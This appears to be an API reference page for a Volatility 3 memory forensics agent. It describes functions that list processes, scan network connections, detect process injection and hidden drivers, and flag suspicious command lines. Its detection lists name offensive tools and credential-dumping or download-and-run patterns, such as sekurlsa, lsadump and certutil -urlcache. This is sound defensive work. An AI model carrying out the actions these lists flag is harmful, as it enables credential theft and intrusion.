mukul975
27c6414ca5
Complete skill folder anatomy across all cybersecurity skills: - scripts/agent.py: 80-150 line Python agents using real libraries (impacket, boto3, azure-mgmt-*, kubernetes, pefile, yara, scapy, shodan, stix2, etc.) - references/api-reference.md: real API documentation with method signatures - LICENSE: MIT license for all skill folders
2.3 KiB
API Reference: Memory Forensics Agent (Volatility 3)
Overview
Automates memory forensics analysis using Volatility 3: process listing, network connections, process injection detection, command line extraction, and hidden driver/rootkit detection.
Dependencies
| Package | Version | Purpose |
|---|---|---|
| volatility3 | >=2.0 | Memory forensics framework (subprocess) |
CLI Usage
python agent.py --memory-file memory.raw --output forensics_report.json
Key Functions
run_volatility(memory_file, plugin, extra_args)
Executes a Volatility 3 plugin via subprocess and parses tab-delimited output into dictionaries.
analyze_processes(memory_file)
Runs windows.pslist and flags processes matching known offensive tools (mimikatz, cobalt, meterpreter, psexec).
analyze_network_connections(memory_file)
Runs windows.netscan to extract network connections and filters for ESTABLISHED state.
detect_process_injection(memory_file)
Runs windows.malfind to detect injected code in process memory (RWX pages with executable content).
analyze_dlls(memory_file, pid)
Lists loaded DLLs for a specific process or all processes via windows.dlllist.
extract_command_history(memory_file)
Runs windows.cmdline and flags suspicious patterns (encoded PowerShell, credential dumping, LOLBins).
check_kernel_modules(memory_file)
Compares windows.modules with windows.driverscan to detect hidden/rootkit drivers.
Volatility 3 Plugins Used
| Plugin | Purpose |
|---|---|
windows.pslist |
List running processes |
windows.netscan |
Extract network connections |
windows.malfind |
Detect process injection |
windows.dlllist |
List loaded DLLs |
windows.cmdline |
Extract command line arguments |
windows.registry.hivelist |
List registry hives |
windows.modules |
List kernel modules |
windows.driverscan |
Scan for driver objects |
Suspicious Process Indicators
Processes flagged: mimikatz, procdump, psexec, cobalt, beacon, meterpreter, nc.exe, ncat, certutil, bitsadmin, mshta, regsvr32, wscript, cscript.
Suspicious Command Patterns
Commands flagged: powershell -enc, invoke-expression, downloadstring, net user, sekurlsa, lsadump, reg save, vssadmin, certutil -urlcache, bitsadmin /transfer.